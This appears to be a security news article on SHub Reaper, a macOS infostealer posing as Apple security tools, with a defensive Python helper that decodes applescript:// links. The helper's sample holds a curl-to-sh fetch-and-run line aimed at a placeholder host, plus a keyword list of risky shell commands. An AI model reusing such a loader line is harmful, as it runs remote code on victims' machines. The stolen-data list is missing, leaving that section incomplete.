New macOS Infostealer Poses as Apple Security Tools to Steal Sensitive Data

Introduction

A recently discovered macOS infostealer, dubbed SHub Reaper, is leveraging the guise of official Apple security software to compromise users' systems. According to SentinelOne, this malware targets passwords, cryptocurrency wallets, and sensitive files while abusing legitimate macOS features to evade detection. This article explores how Reaper operates, its evolution from earlier variants, and what users can do to stay protected.

[Image: New macOS Infostealer Poses as Apple Security Tools to Steal Sensitive Data. Source: appleinsider.com]

How SHub Reaper Works

SHub Reaper disguises itself as authentic Apple security tools, tricking victims into installing it. Once inside, the malware employs AppleScript and legitimate macOS system processes to execute its malicious activities. By mimicking trusted tools, Reaper can bypass traditional antivirus scanners that rely on signature-based detection.

Abuse of AppleScript and URL Schemes

Unlike earlier versions, Reaper cleverly exploits the applescript:// URL scheme to launch commands via macOS's built-in Script Editor. This technique enables the malware to automatically run malicious AppleScript code without requiring the user to manually paste commands into Terminal—a common requirement for older variants. The result is a smoother infection process that appears more legitimate to unsuspecting users.
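As an added illustration for defenders (not code from the article or from SentinelOne's analysis), the following Python helper pulls applescript:// links out of a saved web page or message body, decodes the AppleScript they carry, and flags scripts that reach for the shell or a download tool. The URL layout with `action` and `script` query parameters is an assumption about Script Editor's scheme, the risky-phrase list is a heuristic, and the sample HTML is constructed.

```python
"""Triage helper for applescript:// links found in pages, emails or pop-up markup.

Assumed scheme layout (not taken from the article):
    applescript://com.apple.scripteditor?action=new&script=<percent-encoded AppleScript>
Script Editor handles such links, so a lure page can hand it a ready-made script.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Match a link up to the first whitespace, quote or angle bracket.
URL_RE = re.compile(r"applescript://[^\s'\"<>]+", re.IGNORECASE)

# Heuristic phrases that turn an AppleScript into a loader; tune for your environment.
RISKY = ("do shell script", "curl", "osascript", "chmod", "xattr",
         "base64", "with administrator privileges")


def extract_links(text):
    """Return every applescript:// link in the text, in order of appearance."""
    return URL_RE.findall(text)


def decode_script(url):
    """Return (action, script) from one applescript:// URL; missing parts become ''."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # parse_qs percent-decodes
    return query.get("action", [""])[0], query.get("script", [""])[0]


def risky_phrases(script):
    """List the heuristic phrases present in the decoded script (case-insensitive)."""
    low = script.lower()
    return [p for p in RISKY if p in low]


def triage(text):
    """Decode each embedded script and attach the risky phrases it contains."""
    findings = []
    for url in extract_links(text):
        action, script = decode_script(url)
        findings.append({"url": url, "action": action, "script": script,
                         "hits": risky_phrases(script)})
    return findings


# Constructed sample: one benign link and one that pipes a download into a shell.
SAMPLE = """
<a href="applescript://com.apple.scripteditor?action=new&script=display%20dialog%20%22hello%22">demo</a>
<a href='applescript://com.apple.scripteditor?action=new&script=do%20shell%20script%20%22curl%20-s%20http%3A%2F%2Fexample.invalid%2Fx%20%7C%20sh%22'>Run Apple Security Check</a>
"""

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(("SUSPICIOUS " if f["hits"] else "benign     ") + f["script"], f["hits"])
```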

Stealth and Persistence

The malware uses legitimate system processes to hide its activities, making it harder for security software to flag it. By piggybacking on processes that macOS trusts, Reaper can maintain persistence on infected machines, stealing data over time without raising alarms. Researchers at SentinelOne note that this represents a significant leap in sophistication for the SHub Stealer malware family.

Evolution from SHub Stealer

The SHub malware family has been active for at least two years, primarily targeting macOS users through criminal campaigns. Earlier versions, such as the original SHub Stealer, relied on fake installers and ClickFix social engineering—a tactic that tricked victims into copying and pasting malicious Terminal commands after clicking a fake error message.

Reaper builds upon these methods by integrating with macOS's Script Editor, streamlining the attack vector. This evolution shows how threat actors continuously refine their tools to exploit user trust in operating system utilities.

What Information Is Stolen?

Once deployed, SHub Reaper gathers:

The stolen data is sent to remote command-and-control servers controlled by attackers, who can then use it for identity theft, financial fraud, or further targeted attacks.

How to Protect Yourself

Although SHub Reaper is sophisticated, users can take several steps to reduce risk.

Verify Software Source

Always download software directly from the official App Store or from developer websites you trust. Be wary of any pop-up messages urging you to install security tools, especially those that claim to be from Apple but direct you to external URLs.

Keep macOS Updated

Apple regularly releases security patches that fix vulnerabilities exploited by malware like Reaper. Ensure your system is up to date by enabling automatic updates.

Use Reliable Security Software

While Reaper attempts to evade traditional scanners, employing reputable antivirus solutions that include behavioral detection can help identify suspicious activity on your Mac.

Conclusion

SHub Reaper represents a growing trend of macOS malware that leverages native system features to avoid detection. By disguising itself as Apple security tools and abusing AppleScript, it poses a serious threat to users' passwords, cryptocurrency, and personal files. Staying vigilant about software sources, applying updates, and using robust security tools are the best defences against this evolving infostealer.

For ongoing updates, follow our analysis and check official security advisories from Apple and SentinelOne.
